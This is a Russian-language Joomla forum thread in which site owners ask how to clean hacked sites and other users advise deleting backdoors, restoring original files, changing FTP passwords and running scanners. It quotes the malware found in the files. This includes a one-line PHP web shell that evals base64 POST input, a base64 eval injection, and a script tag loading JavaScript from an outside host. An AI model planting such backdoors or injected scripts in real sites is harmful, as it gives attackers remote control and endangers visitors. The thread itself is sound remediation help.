Взломан сайт! - (Backdoor.PHP.WebShell.etc). - Безопасность сайтов на Joomla

Здравствуйте!
Взломан сайт! Требуется помощь специалистов.

Сайт каталог (ZOO) на Joomla 1.5.
При наборе адреса сайта в  адресной строке браузера, все нормально - попадаю на сайт. По ссылке  найденной в поисковой системе   "Яндекс"  -происходит переадресация  на сайты с рекламой. При этом с компьютеров, на которых  установлен антивирус Касперского,  страница не открывается - блокируется антивирусом.  Выводится следующее:

ДОСТУП ЗАПРЕЩЕН
Запрашиваемый URL-адрес не может быть предоставлен

URL-адрес:

http://netavia.jetos.com/

Заблокирован Веб-Aнтивирусом

Причина: вредоносная ссылка

В целях устранения лечения скачал файлы  сайта  с сервера по FTP и проверил антивирусом.  В результате было найдена 2 файла, - Backdoor.PHP.WedShell.etc  и другой название которого не помню. Удалил указанные файлы, сайт работает,  но проблема не решена. Восстановление  из ранних сохранений  - не помогло.
Так же пробовал переустанавливать Joomla, за одно и обновил, но ситуация этим способом так и не была исправлена.

Провел  сканирование файлов сайта сканером  FLS результаты:
К сожалению в РНР слаб.  

Что можно сделать в данной ситуации ?

File: /home/g/gwgroupru/public_html/templates/beez/index.php
String:: _shell_atildi_

это раз

это раз

Благадарю!

В файле index.php - была всего одна строка:index.php.
Это файл шаблона. При том шаблона который не использовался. Удалил, но это не спасло....

File: /home/g/gwgroupru/public_html/images/post.php
String:: $_POST[

два проверить что там

и смотреть сторонний код в *.js и *.php файлах
htaccess проверить
и чистить сайт

два проверить что там

и смотреть сторонний код в *.js и *.php файлах
htaccess проверить
и чистить сайт

Благадарю за ответ!

В указанном файле  одна строка:
<?php eval(base64_decode($_POST["php"])); ?>

Моих знаний к сожалению не достаточно что бы понять, что в данном файле не так.
.htaccess - вроде бы в порядке, но могу и ошибаться.
Я так понимаю, что во всех указанных при  использовании сканера  FLS файлов и путях к ним содержится вредоносный код. Правильно?

Моих знаний к сожалению не достаточно что бы понять, что в данном файле не так.

В это файле всё не так. Его нужно удалить. Причём можно практически гарантировать, что он такой "плохой" не единственный.

Я так понимаю, что во всех указанных при  использовании сканера  FLS файлов и путях к ним содержится вредоносный код. Правильно?

нет
те файлы которые сканер показывает надо просто проверить

В это файле всё не так. Его нужно удалить. Причём можно практически гарантировать, что он такой "плохой" не единственный.

Файл удалил, - безрезультатно. Действительно -  файл такой не единственный.

нет
те файлы которые сканер показывает надо просто проверить

Благодарю за ссылку, познавательно.
В статье указанно о том, что ВАЖНО- проверить и поддомены. На хостинге размещен сайт -поддомен, который гораздо популярней основного сайта. С поддомена в поисковиках переадресации не происходит.  Провел сканирование поддомена FLS. Результаты:

Подскажите пожалуйста на что .htaccess стоит обратить внимание?

В файле, указанном при сканирование FLS

File: /home/g/gwgroupru/public_html/administrator/components/com_sef/models/config.php
String:: $_POST[

в первой строке есть код:

<?php       eval(base64_decode("DQplcnJvcl9yZXBvcnRpb***p9DQp9"));

- Это лишнее?

-стоит удалтить файл целиком, или только строку?

Ваш base64_decode

Вот тут обсуждалось
http://joomlaforum.ru/index.php/topic,196376.30.html
У Яндекс-а тоже есть ответ
http://safesearch.ya.ru/replies.xml?item_no=226

Спасибо за ссылки!

Получил полезную информацию, в соответсnвии с которой пытался провести поиск и замену вредоносного кода  на стороне сервера с использованием скрипта replace.php  (http://cmsdev.org/files/cnt.php?file=replace.zip).   Данный способ мне не помог, по итогам вывелось  сообщение о большом количестве найденных файлов в которых содержится вредоносный код   и об ошибке. Из сообщения следовало, что замена не произведена.
Попробовал другой способ:
Скачал с сервера все файлы сайта, провел средствами Total Commander поиск кода:

В результате Total Commander – было найдено 1022 файла в которых содержится указанный код. В ручную удалять код из такого количества файлов практически не реально. С использованием программы  Notepad++ произвел замену указанного  кода  <?php eval(base64_decode(.........)
на код "<?php ".

Так же удалил указанные  сканером  файлы в одной из папок шаблонов -templates: index.рнр в котором содержалась строка:

_shell_atildi_

И  файл  из папки с изобращениями images/post.php в котором находилась строка:

<?php eval(base64_decode($_POST["php"])); ?>

Залил почищенные файлы обратно на сервер,  но к положительному результату это  не привело.  По прежнему со ссылок на сайт найденных в поисковых системах  идет переадресация. Антивирусы блокируют страницу.

Что ещё можно сделать?

1. Если не хакали Joomla, можно было заменить файлы из оригинального архива.
2. Notepad++ надо было пользоваться используя регулярные выражения "и новые строки" заменять код вируса на пустое значение.
Модификаций кода может быть много.
3. Сайт надо было проверять антивирусами, желательно 2. Но не лечить и не удалять. Только запоминать и контролировать зараженные файлы, которые лечить в с. п. 1-2

Ура! Победа!
Благодарю всех за помощь и полезные советы!

После всех проведенных указанных выше мероприятий по замене содержащегося в файлах сайта вредоносного кода, вновь заменил файлы из оригинального архива Jаoomla- и всё! Проблема решена!

как убрать вредоносную ссылку с сайта? помогите!

Создайте новую тему в этом разделе с подробным описанием проблемы, версией Joomla и ссылкой на сайт.

как убрать вредоносную ссылку с сайта? помогите!

Скачать шаблон сайта, и искать вставку base64_decode
И сканер в помощь http://joomlaforum.ru/index.php/topic,198048.0.html

Сканер fls выдал несколько файлов с подозрением на $_POST[ и confirm(
 Нашел в них такое:
и так далее в таком роде. Зараженные эти файлы или нет?
Если нет, то что должно быть в зараженном коде после $_POST[ и сonfirm(  ?

Сканер fls выдал несколько файлов с подозрением на $_POST[ и confirm(
 Нашел в них такое:
***
 и так далее в таком роде. Зараженные эти файлы или нет?
Если нет, то что должно быть в зараженном коде после $_POST[ и сonfirm(  ?

Этот сканер выдает все php файлы в которых находит текст, удовлетворяющий условиям поиска. А в условия поиска как раз и входят переменная $_POST и текст confirm и еще много всяких слов) Только это далеко не значит, что найденный файл, содержащий одно из этих слов заражен. Переменная $_POST так же, как и java функция confirm используются в некоторых вполне нормальных компонентах и для того, чтоб отличить инфицированный файл от неинфицированного нужно понимать хоть немного в php. Тогда вы будете видеть что делает данный файл, в котором нашли якобы плохой код и сможете решить удалять его или нет.
Код файла, который вы написали незаражен. А касаемо того что должно быть в зараженном коде - тут нет однозначного ответа, может быть все что угодно)) Я вот сейчас тоже чищу сайт клиента, так там сразу видно, что сайт заражен..

Снова заражение. Файл шаблона index.php
Проверил прописался модуль с файлом который взламует конфигурационный файл..
Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?

Код

<!-- 1bc||stat -->
<script type="text/javascript" src="http://afleks.ru/logs/js.js"></script>
<!-- /1bc||stat -->

Снова заражение. Файл шаблона index.php
Проверил прописался модуль с файлом который взламует конфигурационный файл..
Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?

Смена пароля - это первое, что нужно сделать! Наверняка у них есть ваш пароль и чистить без смены пароля можно до конца жизни.

Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?

Ищите шелл, бекдор.Найти- удалить, сменить пароли доступа

Ищите шелл, бекдор.Найти- удалить, сменить пароли доступа

Уже нашел и удалил!

Доступ к ftp поменть? Пароль?

является ли данное сообщение антивируса опасным для сайта.

При скачивании файлов сайта evrokub, антивирус заблокировал следующие файлы

http://prntscr.com/i4wj50

Следовательно, что стоит предпринять в данной ситуации?

является ли данное сообщение антивируса опасным для сайта.

Да, ваш сайт заражен. Принимайте меры по устранению заражения.

Я конечно понимаю, сейчас напишут в Google помощь))

А с чего начать?

И какие конкретно меры предпринять с пострадавшими файлами?

Можно, что-то вроде инструкции. Может есть опытные в этой теме.

Я конечно понимаю, сейчас напишут в Google помощь))

А с чего начать?

И какие конкретно меры предпринять с пострадавшими файлами?

Можно, что-то вроде инструкции. Может есть опытные в этой теме.

На инструкцию денег не хватит.
Если надо вылечить - в комм раздел, за адекватные уже деньги можно вылечить

На инструкцию денег не хватит.
Если надо вылечить - в комм раздел, за адекватные уже деньги можно вылечить

конкретнее можно. Адекватные это сколько.

А то тут форум, о воде видимо забыли дописать.

конкретнее можно. Адекватные это сколько.

А то тут форум, о воде видимо забыли дописать.

На форуме есть правила - надо вылечить, идите в коммерческий раздел.
Выпрашивая услугу в чужой теме вы сами нарушаете правила и принуждаете нарушать других.
ЗЫ. В подписях (не только моей) есть ссылки на услуги, там всё расписано, надо только кликнуть

Лечить можно обновив по возможности расширения и ядро Joomla + проверив их на уязвимости хотя бы по публичным спискам, сменив пароли и проверив сайт в параноидальном режиме скриптом айболит (в таком случае читайте отчет от него) и удалить найденный вредоносный код. Не весь код найденный этим скриптом может быть вредоносным, что-то он может не найти. Необходимо самому иметь некоторые навыки.